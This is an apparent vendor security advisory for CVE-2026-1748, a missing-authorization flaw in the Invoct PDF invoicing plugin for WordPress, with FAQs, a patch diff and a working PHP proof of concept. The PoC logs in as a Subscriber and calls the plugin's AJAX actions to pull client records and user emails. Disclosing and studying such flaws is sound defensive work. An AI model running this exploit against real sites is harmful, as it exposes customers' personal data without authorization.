What is CVE-2026-1748?

CVE-2026-1748 is a medium-severity vulnerability in the Invoct – PDF Invoices & Billing for WooCommerce plugin for WordPress. It allows authenticated users with Subscriber-level access and above to access sensitive data due to a missing authorization check.

How does the vulnerability work?

The vulnerability arises from a lack of capability checks in several AJAX functions of the plugin. Authenticated users can exploit this by sending requests to specific AJAX endpoints, retrieving sensitive data such as invoice clients and WordPress user emails.

Who is affected by this vulnerability?

Any WordPress site using the Invoct – PDF Invoices & Billing for WooCommerce plugin version 1.6 or earlier is affected. This includes sites where authenticated users have Subscriber-level access or higher.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Invoct plugin installed. If it is version 1.6 or earlier, your site is vulnerable. Additionally, review server logs for unauthorized access attempts to the affected AJAX endpoints.

How can I mitigate this vulnerability?

The primary mitigation is to update the Invoct plugin to version 1.7 or later, where the vulnerability is patched. Additionally, restrict access to sensitive data and monitor user permissions.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity risk. This means that while exploitation is possible, it requires authenticated access, limiting the potential impact to sites with lower security controls.

What is the significance of the capability check added in version 1.7?

The capability check added in version 1.7 restricts access to the vulnerable functions to users with administrator privileges only. This change effectively prevents lower-privileged users from accessing sensitive data.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to the vulnerable AJAX endpoints. It illustrates the ease with which sensitive data can be retrieved without proper authorization.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the plugin until it can be updated. Review user roles and permissions to limit access to the plugin’s functionality as a temporary measure.

Are there any long-term implications of this vulnerability?

Long-term implications include the risk of targeted phishing attacks using the exposed email addresses and the potential for further exploitation if attackers gain additional insights into the site’s user base.

How can I stay informed about similar vulnerabilities?

To stay informed about similar vulnerabilities, regularly check security advisories from WordPress, subscribe to security mailing lists, and consider using security plugins that provide vulnerability notifications.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1748: Invoct – PDF Invoices & Billing for WooCommerce <= 1.6 – Missing Authorization to Authenticated (Subscriber+) Information Exposure (kirilkirkov-pdf-invoice-manager)

Q: What types of data can be exposed?

Exploitation of this vulnerability can lead to unauthorized access to invoice clients, detailed invoice items, and a list of all WordPress users along with their email addresses, compromising user privacy.

CVE ID CVE-2026-1748

Plugin kirilkirkov-pdf-invoice-manager

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 1.6

Patched Version 1.7

Disclosed February 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1748:
The vulnerability is a missing authorization flaw in the Invoct – PDF Invoices & Billing for WooCommerce WordPress plugin. It affects versions up to and including 1.6, allowing authenticated users with Subscriber-level permissions or higher to access sensitive administrative data. The CVSS score of 4.3 reflects a medium-severity information exposure risk.

The root cause is the absence of a capability check in four AJAX handler functions within the plugin’s main file. The vulnerable functions `kirilkirkov_wp_inv_select_clients`, `kirilkirkov_wp_inv_select_client_by_id`, `kirilkirkov_wp_inv_select_items`, and `kirilkirkov_wp_inv_select_customers` in `/kirilkirkov-pdf-invoice-manager/KirilKirkovWpInvoices.php` only verified the request originated from the admin area via `is_admin()`. This check does not validate user permissions. Lines 564, 584, 604, and 625 in the diff show each function contained the insufficient conditional `if (!is_admin())`.

Exploitation occurs through WordPress’s AJAX interface. An authenticated attacker with any role, including Subscriber, sends a POST request to `/wp-admin/admin-ajax.php`. The request must include the `action` parameter set to one of the vulnerable plugin hooks: `kirilkirkov_wp_inv_select_clients`, `kirilkirkov_wp_inv_select_client_by_id`, `kirilkirkov_wp_inv_select_items`, or `kirilkirkov_wp_inv_select_customers`. No other parameters or special payloads are required. The server executes the corresponding function and returns the sensitive data.

The patch in version 1.7 adds a proper capability check to each vulnerable function. The diff shows the conditional statement was changed from `if (!is_admin())` to `if (!is_admin() || !current_user_can(‘manage_options’))`. The `current_user_can(‘manage_options’)` function restricts access to users with administrator privileges. Before the patch, any authenticated user could trigger these functions. After the patch, only users with the `manage_options` capability can access them, effectively blocking lower-privileged users.

Successful exploitation leads to unauthorized information disclosure. Attackers can retrieve three types of sensitive data: the complete list of invoice clients, detailed invoice items, and a list of all WordPress users along with their email addresses. This data exposure violates confidentiality and could facilitate further attacks, such as targeted phishing campaigns or business intelligence gathering. The impact is limited to data access and does not include privilege escalation or remote code execution.

Differential between vulnerable and patched code

Code Diff

--- a/kirilkirkov-pdf-invoice-manager/KirilKirkovWpInvoices.php
+++ b/kirilkirkov-pdf-invoice-manager/KirilKirkovWpInvoices.php
@@ -6,7 +6,7 @@
 /*
 Plugin Name: Invoct – PDF Invoices & Billing for WooCommerce
 Description: Free and powerful invoicing plugin for WordPress and WooCommerce. Create and manage PDF invoices, set up periodic invoices, handle billing, and track warehouse inventory — all from a simple, unified dashboard. Includes multiple professional invoice templates.
-Version: 1.6
+Version: 1.7
 Author: Kiril Kirkov
 Author URI: https://github.com/kirilkirkov/
 License: GPLv2 or later
@@ -564,7 +564,7 @@
 		 */
 		public function kirilkirkov_wp_inv_select_clients()
 		{
-			if (!is_admin()) {
+			if (!is_admin() || !current_user_can('manage_options')) {
 				wp_die( esc_html__( 'This code is for admin area only', 'kirilkirkov-pdf-invoice-manager' ) );
 			}

@@ -584,7 +584,7 @@
 		 */
 		public function kirilkirkov_wp_inv_select_client_by_id()
 		{
-			if (!is_admin()) {
+			if (!is_admin() || !current_user_can('manage_options')) {
 				wp_die( esc_html__( 'This code is for admin area only', 'kirilkirkov-pdf-invoice-manager' ) );
 			}

@@ -604,7 +604,7 @@
 		 */
 		public function kirilkirkov_wp_inv_select_items()
 		{
-			if (!is_admin()) {
+			if (!is_admin() || !current_user_can('manage_options')) {
 				wp_die( esc_html__( 'This code is for admin area only', 'kirilkirkov-pdf-invoice-manager' ) );
 			}

@@ -625,7 +625,7 @@
 		 */
 		public function kirilkirkov_wp_inv_select_customers()
 		{
-			if (!is_admin()) {
+			if (!is_admin() || !current_user_can('manage_options')) {
 				wp_die( esc_html__( 'This code is for admin area only', 'kirilkirkov-pdf-invoice-manager' ) );
 			}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1748 - Invoct – PDF Invoices & Billing for WooCommerce <= 1.6 - Missing Authorization to Authenticated (Subscriber+) Information Exposure

<?php

$target_url = 'http://vulnerable-wordpress-site.com';

// WordPress credentials for a low-privileged user (e.g., Subscriber)
$username = 'subscriber_user';
$password = 'subscriber_password';

// Initialize cURL session for login
$ch = curl_init();

// Step 1: Authenticate to WordPress to obtain cookies
$login_url = $target_url . '/wp-login.php';
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save session cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Adjust for HTTPS

$response = curl_exec($ch);

// Step 2: Exploit the missing authorization by calling a vulnerable AJAX action
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Choose one of the four vulnerable actions
$vulnerable_actions = [
    'kirilkirkov_wp_inv_select_clients',      // Retrieves invoice clients
    'kirilkirkov_wp_inv_select_client_by_id', // Retrieves specific client
    'kirilkirkov_wp_inv_select_items',        // Retrieves invoice items
    'kirilkirkov_wp_inv_select_customers'     // Retrieves WordPress users/emails
];

$exploit_action = $vulnerable_actions[0]; // Using first action as example

$exploit_fields = [
    'action' => $exploit_action
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_fields));

$exploit_response = curl_exec($ch);

// Output the sensitive data returned by the plugin
echo "Target: $target_urln";
echo "Action: $exploit_actionn";
echo "Response:n";
echo $exploit_response;

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-1748?
Overview of the vulnerability
CVE-2026-1748 is a medium-severity vulnerability in the Invoct – PDF Invoices & Billing for WooCommerce plugin for WordPress. It allows authenticated users with Subscriber-level access and above to access sensitive data due to a missing authorization check.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a lack of capability checks in several AJAX functions of the plugin. Authenticated users can exploit this by sending requests to specific AJAX endpoints, retrieving sensitive data such as invoice clients and WordPress user emails.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Invoct – PDF Invoices & Billing for WooCommerce plugin version 1.6 or earlier is affected. This includes sites where authenticated users have Subscriber-level access or higher.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Invoct plugin installed. If it is version 1.6 or earlier, your site is vulnerable. Additionally, review server logs for unauthorized access attempts to the affected AJAX endpoints.
How can I mitigate this vulnerability?
Recommended actions
The primary mitigation is to update the Invoct plugin to version 1.7 or later, where the vulnerability is patched. Additionally, restrict access to sensitive data and monitor user permissions.
What does the CVSS score of 4.3 indicate?
Understanding severity levels
A CVSS score of 4.3 indicates a medium severity risk. This means that while exploitation is possible, it requires authenticated access, limiting the potential impact to sites with lower security controls.
What types of data can be exposed?
Potential data leakage
Exploitation of this vulnerability can lead to unauthorized access to invoice clients, detailed invoice items, and a list of all WordPress users along with their email addresses, compromising user privacy.
What is the significance of the capability check added in version 1.7?
Changes in the patched version
The capability check added in version 1.7 restricts access to the vulnerable functions to users with administrator privileges only. This change effectively prevents lower-privileged users from accessing sensitive data.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to the vulnerable AJAX endpoints. It illustrates the ease with which sensitive data can be retrieved without proper authorization.
What should I do if I cannot update the plugin immediately?
Temporary measures
If an immediate update is not possible, consider disabling the plugin until it can be updated. Review user roles and permissions to limit access to the plugin’s functionality as a temporary measure.
Are there any long-term implications of this vulnerability?
Potential risks beyond immediate exposure
Long-term implications include the risk of targeted phishing attacks using the exposed email addresses and the potential for further exploitation if attackers gain additional insights into the site’s user base.
How can I stay informed about similar vulnerabilities?
Keeping up with security updates
To stay informed about similar vulnerabilities, regularly check security advisories from WordPress, subscribe to security mailing lists, and consider using security plugins that provide vulnerability notifications.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations